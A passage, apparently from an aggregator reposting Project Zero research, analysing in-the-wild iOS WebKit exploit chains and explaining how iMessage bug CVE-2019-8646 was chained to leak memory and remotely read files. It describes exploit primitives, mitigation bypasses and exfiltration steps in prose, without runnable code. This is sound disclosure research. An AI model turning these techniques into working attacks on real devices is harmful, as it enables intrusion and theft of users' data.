  • Google has this same problem with Chromium (e.g. commit 52a9e67a477b fixing CVE-2018-17463 and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: aa00ee22f8f7 (for issue 1784) and 4edcc8605461 (for issue 1793). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.
  • Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit 7f0d390ad77d for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium’s JavaScript engine) in Edge.
  • Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.

However, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort.
Exploit 1: iOS 10.0 until 10.3.2This exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue 1137 and fixed in WebKit HEAD with commit 4a23c92e6883 on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later.

Of interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.

The bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.Exploit 2: iOS 10.3 until 10.3.3This exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue 1236. The bug was fixed in WebKit HEAD with commit ad6d74945b13 on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. 

The bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.Exploit 3: likely iOS 11.0 until 11.3This exploit targets the WebKit bug 181867 which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018.

The bug is a classic (by 2019 standards) JIT side-effect modelling issue. It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.Exploit 4: likely iOS 11.3 until 11.4.1This exploit targets the bug fixed in commit b4e567d371fd on May 16th 2018 and corresponding to WebKit issue 185694. Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018.

This is another JIT side-effect modelling bug with similar exploit to the previous one, again constructing the fakeobj primitive to fake JS object. However, by now the Gigacage mitigation had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.Exploit 5: iOS 11.4.1This exploit targets CVE-2018-4438, which was first reported by lokihardt as issue 1649. The bug was fixed with commit 8deb8bd96f4a on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018.

Due to the bug, it was possible to construct an Array with a Proxy prototype that wasn’t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.Exploit 6: likely iOS 12.0 until 12.1.1This exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue 1699 and fixed in HEAD with commit 1f1683cea15c on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018.

In contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a JSBoundFunction’s m_boundArgs array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object’s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke JSBoundFunction::boundArgsCopy which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously).

This fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.Exploit 7: iOS 12.1.1 until 12.1.3The final exploit targets the same bug as exploited by Linus Henze here:, which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be 191731. It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team flouroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019.

Instead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.Shellcode ExecutionAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function’s JIT code and then invoking that function.

For some time now (first announced by Apple at BlackHat 2016 and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, “hidden” mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a “jit_memcpy” function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device.

In more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the ”jit_memcpy” function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.
Kategorie: Hacking & Security

The Many Possibilities of CVE-2019-8646

22 Srpen, 2019 - 21:49
Posted by Natalie Silvanovich, Project Zero
CVE-2019-8646 is a somewhat unusual vulnerability I reported in iMessage. It has a number of consequences, including information leakage and the ability to remotely read files on a device. This blog post discusses the ways that an attacker could use this bug. It is a good example of how the large number of classes available for NSKeyedArchiver deserialization can make a bug more versatile. It’s also a good example of how minor functional bugs can make a vulnerability more useful. 

Please note that this blog post assumes some familiarity with NSKeyedArchiver deserialization. If you haven’t read our general post on iMessage, I’d recommend reading that first. The BugThe bug described in CVE-2019-8646 is that an unsafe class, _NSDataFileBackedFuture, can be deserialized by iMessage in a remote context. It was introduced in iOS 12.1. This class is a subclass of NSData that initializes a buffer with the contents of a file at the time the buffer is used. When this class is deserialized, it decodes the length of the buffer, a string file name and a few other objects. It then initializes the instance with the length and filename. Then when [_NSDataFileBackedFuture length] is called, it returns the deserialized length. When [_NSDataFileBackedFuture bytes]is called, the file is opened and loaded into a buffer into memory, and the buffer is returned. The buffer is also cached for future calls to the method.

There are two immediate problems with being able to deserialize this class in an untrusted context. One is that it has the potential to allow a process to access a file that it is not authorized to access, because the process doing the deserialization is the one that loads the file. When I reported this bug, I thought that this was more likely to be a concern for deserialization that occurs locally via IPC as opposed to deserialization that occurs on a remote target like iMessage. The second is that this class violates one of the guarantees that the NSData class makes, that the length property will always return the length of the bytes property. This is because the length of the buffer returned by [_NSDataFileBackedFuture bytes]is the length of the loaded file, and has no relationship to the deserialized length returned by  [_NSDataFileBackedFuture length].

The original proof-of-concept (PoC) attached to the bug report is a simple out-of-bounds read. The payload includes a serialized instance of class ACZeroingString, which is a subclass of NSString. Its initWithCoder method deserializes an instance of class NSData, as well as a length that must be half the [NSData length] that it uses to initialize the contents of the string. If the NSData instance is of subclass _NSDataFileBackedFuture, the length property of the instance can be longer than its internal data, causing the PoC to return a string that contains the contents of unallocated memory, or cause a crash.Accessing a Remote URLAt this point, this bug didn’t seem that useful for a remote attack, so I wondered if it would be possible for it to access a remote URL instead of a local file. The URL is accessed by calling [NSData initWithContentsOfURL:options:error:], which can initialize a buffer from any type of URL, including HTTP URLs, however the _NSDataFileBackedFuture  class contains some checks to prevent this.

There are no checks to the URL on initialization, but there are some checks when the URL is accessed in [_NSDataFileBackedFuture fileURL]. Specifically, it calls [NSURL path] on the URL, and then calls [NSFileManager fileExistsAtPath:] on that path. This does not check that the URL is a file URL before checking the path. So it is possible to bypass this check by using a URL that has a path component that resolves to an existing file. I used: a URL with Unprintable CharactersThe ability to make a request to a URL created an interesting possibility. Maybe it was possible to use the URL to leak data remotely. Since the original PoC created a string that contained leaked data, and the NSURL class is deserialized using a string, it didn’t seem like it would be that difficult. It turned out there was a problem using the NSURL class though. An NSURL instance has very strict limitations on the characters it can contain. This class is mostly open-source, so the exact limitations can be seen in the _CFStringIsLegalURLString method. This is a very robust method, and I did not find any ways to get around the limitations. I did notice that after the method succeeds, the method _CFURLInit is called, which calls CFStringCreateCopy on the input string, so it caches a copy of the validated string to use as the URL later.

One idea I had was to change the string after the URL was created, because the URL string is only validated once. In the absence of bugs, this shouldn’t be possible. CFStringCreateCopy calls [NSString copy] on most string objects, and for a mutable string, this should copy the string, so that any future changes to the string do not affect the copy. For a non-mutable string, it sometimes just increases the retain count on the string, but that also shouldn’t be a problem, because the contents of a mutable string can’t change.

I looked through the subclasses of NSString that can be deserialized in iMessage to see if there were any that didn’t follow the mutable copy rules described above. There were a few, but the most promising was the class INDeferredLocalizedString. This class is technically immutable (in that it extends NSString instead of NSMutableString), and it implements copy by adding a reference. But the value of an INDeferredLocalizedString instance can change. Its deserialization implementation in pseudocode is as follows.

INDeferredLocalizedString *__cdecl -[INDeferredLocalizedString initWithCoder:](INDeferredLocalizedString *self, id decoder){ self->_formatKey = [decoder decodeObjectOfClass:[NSString class] forKey:@"_formatKey"]; self->_table = [decoder decodeObjectOfClass:[NSString class] forKey:@"_table"]; self->_arguments = [decoder decodeObjectOfClasses:@[[NSString class], [NSArray class]] forKey:@"_arguments"]; self->_bundleIdentifier = [decoder decodeObjectOfClass:[NSString class] forKey:@"_bundleIdentifier"]; self->_bundleURL = [decoder decodeObjectOfClass:[NSURL class] forKey:@"_bundleURL"]; self->_cachedLocalization = [decoder decodeObjectOfClass:[NSString class] forKey:@"_cachedLocalization"]; return self;}

It deserializes many properties, including a bundle URL that can be used for localization, a format string with a corresponding array of localized strings and a cached string. When an INDeferredLocalizedString instance is accessed, its value is determined by calling [INDeferredLocalizedString localizeForLanguage:], which generates the string based on these values and the device’s language settings. The deserialized properties have a precedence. For example, the class would prefer to fetch a string from a bundle as opposed to generating it from the format string.

Even with these properties, the string would only change if the device’s language changed, however, it is possible to make the string change due to the issues with cycling in NSKeyedArchiver deserialization described in this post. The highest precedence property of the class, the _cachedLocalization string is deserialized last, meanwhile a lower precedence property _formatKey is serialized earlier. The bundle URL is deserialized in the middle of these two. So if an instance of class INDeferredLocalizedString has a valid _formatKey, and then the bundle URL’s string is a reference to the string itself, the URL will validate the _formatKey when it is being created. Initialization of the INDeferredLocalizedString instance will then continue, and the _cachedLocalization string will be deserialized and set as a property. After the INDeferredLocalizedString deserialization is complete, the URL will be available in the NSKeyedUnarchiver decoder’s cache. When another class, such as _NSDataFileBackedFuture, uses it, the string value will now be generated based on the _cachedLocalization property, which is the unvalidated string.

This behavior allowed me to create a message that would leak memory and send it to a remote server as a URL parameter. A sample message with this behavior is available here. That said, the parameter is only read up to the first null character, so this PoC usually only sends a few bytes. This is probably enough to leak a single pointer to break ASLR with enough tries, but not good for much else.Concatenating and Encoding Leaked DataThis limitation also prevents a more interesting attack: remotely leaking a file. Since the _NSDataFileBackedFuture class can load a file into a buffer, and also send the contents to a remote URL, is a possible attack, but the prevalence of null characters in file format headers limits its usefulness.

There is also a more subtle problem preventing the PoC above from being immediately repurposed to leak a file. The PoC works by creating a _NSDataFileBackedFuture instance with contents that are smaller than its length, then using that instance to create an  ACZeroingString instance, which in a roundabout way becomes the string of a URL. That URL is then used as the URL of another _NSDataFileBackedFuture instance. But what is the string value of the URL of the first _NSDataFileBackedFuture instance? I used another remote URL which responded with a buffer containing another partial URL ( So when the _NSDataFileBackedFuture buffer is read out of bounds when creating the ACZeroingString instance, the leaked data continues the URL. This is not possible when accessing a file with _NSDataFileBackedFuture, because the file contents are set and generally are not in the format of a URL. So in order to leak a file, I also need to be able to concatenate strings.

The INDeferredLocalizedString class has functionality that is helpful in getting around both of these limitations. Two properties that can be decoded during deserialization are the string _formatKey and an array of strings,  _argument.  If an INDeferredLocalizedString instance has only these properties, it will generate its value using the first property as a format string, and the second property as its parameter.

(You might be wondering at this point whether this behaviour is a vulnerability in itself because an attacker can control both a format string and its parameters. It’s not, because the class uses a ‘fake’ format string implementation that is based on regular expressions. The implementation searches for instances of “%@” or similar in the format string, and then replaces them sequentially with values from the array).

This format string behaviour allows the ACZeroingString instance to be inserted into a string containing a URL, and it also helps with the issue of null characters. When an ACZeroingString instance is formatted with “%@”, non-printable characters are escaped in the format “\UXXXX”. Single null bytes will be added to the string as a part of a character in this way, however if there are two null bytes in a row, this character will be omitted. This type of encoding is useful in some contexts (for example, leaking the SMS database, where there are a lot of null characters, but only the string are relevant), but is not enough to completely leak a full file.

Looking at the ‘fake’ format string function a bit more, it calls  description on every member of the arguments array before inserting it into the format string. This would be very useful behavior if the arguments array wasn’t limited to containing string types. Calling description on an instance of class NSURL URL encodes the URL string before it is inserted. So if it was possible to put the URL containing the leaked bytes into the arguments array, it could be encoded, which would allow the entire file to be sent as a part of a URL.

There is a problem in NSKeyedUnarchiverSerialization which can allow objects that are not included in the allow list to be returned when an instance of class NSArray or NSDictionary is deserialized. The first time an array or dictionary is deserialized, every element, key or value that is deserialized as a part of the object’s contents is checked against the allow list. But if the object has already been deserialized, the object is returned from the NSKeyedUnarchiverSerialization instance’s object cache, and only the object, and not its elements, keys or values are checked against the allow list. So the _arguments array could contain a URL, so long as the array had already been deserialized elsewhere.

It was a bit of a challenge finding somewhere an array containing a URL could be deserialized in iMessage. The top level allow list does not include class  NSArray, and I could not find a class with an initWithCoder: implementation that contained a deserialization call that allows both arrays and URLs. I eventually implemented it so that it uses the bug twice. First, a dictionary containing the URL is decoded, which is allowed at the top level. Then, an instance of __NSLocalizedString is decoded, which decodes a property NS.configDict, which allows arrays and dictionaries, but not URLs, but because of the bug, a dictionary containing a URL is okay. Then, the bug is used again when initializing the _arguments array of the INDeferredLocalizedString instance, which is allowed because it only checks that the referenced array is an instance of NSArray. When this object is formatted into a string, it will contain some extra characters due to the dictionary, but otherwise will still be encoded.Leaking a FilePutting this all together allowed for a file to be read remotely from an iPhone. There are a few limitations to this attack. First, it is very memory intensive, the largest memory hog being the ‘fake’ format string function that needs to handle a very long string. SpringBoard can crash due to memory limits if the file is too long. The limit appears to be around 40kB to 100kB depending on device memory, though it’s likely this could be increased with enough effort. It is possible to fetch the beginning of a larger file within this limit, and also reduce memory usage a bit by using escape (“\U”) encoding instead of URL encoding in situations where stripping null characters are okay.

The encoding of the URL returned to the remote server is also quite complex. The URL is escaped for a few characters up until the end of where the URL schema would be is reached, and then it moves into URL encoding. The URL coding is also escaped though, so it needs to be unescaped before it is URL decoded., The escaped characters are in UTF-16 meanwhile the URL encoded characters are in UTF-8, complicating matters. Then there can be a third section of the URL that is just escaped, which occurs because when the valid characters are switched for the invalid characters when creating the URL it retains the length of the valid characters. If the URL is too short, the extra characters will only be escaped.

There’s another problem with encoding, which is that sometimes printable characters are duplicated in the URL encoded string. It’s not clear why this happens, it could be a bug in [NSURL description] or the URL encoder. It is fairly easy to programmatically recognize and correct these duplications, but there is always the possibility that a file contains these exact patterns, at which case the file could be read with errors. A python script that decodes all the iterations of encoding in a returned URL and outputs a file is available here. I have not seen any files that contain errors after being processed with this script, but there is a small probability that this could occur.

The following video shows this vulnerability being used to access a photo from a remote device’s memory. First the sms.db file is accessed to get the URL of the photo, and then the photo is accessed.
ConclusionCVE-2019-8646 is a vulnerability in iMessage that can allow memory to be leaked and files to be read remotely from a device. The bug was fixed on July 23, 2019. This fix requires the class to be explicitly allowed for deserialization, as opposed to being allowed in any situation that permits NSData deserialization. 

There were several factors that caused this bug to be exploitable in this way. One is the large number of classes available for deserialization in SpringBoard. Without the ACZeroingString,  INDeferredLocalizedString and __NSLocalizedString object being available, this bug would be less useful to an attacker.

Also, there were three small bugs that contributed to this bug’s capabilities. First, the error in [INDeferredLocalizedString copy] is a bug that would usually just lead to occasional crashes when the device’s language was changed, but in this situation, it turned out to be exactly the bug that was needed to circumvent the character restrictions of the NSURL class. Likewise, the error in NSKeyedUnarchiver that allows arrays and dictionaries containing any type of object to be returned if they are already decoded would usually only cause exceptions related to typing, but in the case allows for a URL to be encoded. Finally, the ability of the  _NSDataFileBackedFuture class to access remote URLs was also a small bug in URL filtering. This shows that there is a security benefit to avoiding and fixing bugs, even if they don’t have an obvious security impact. Alone, none of these bugs, including the vulnerability were that serious, but together they allow a user’s data to be accessed remotely.
Kategorie: Hacking & Security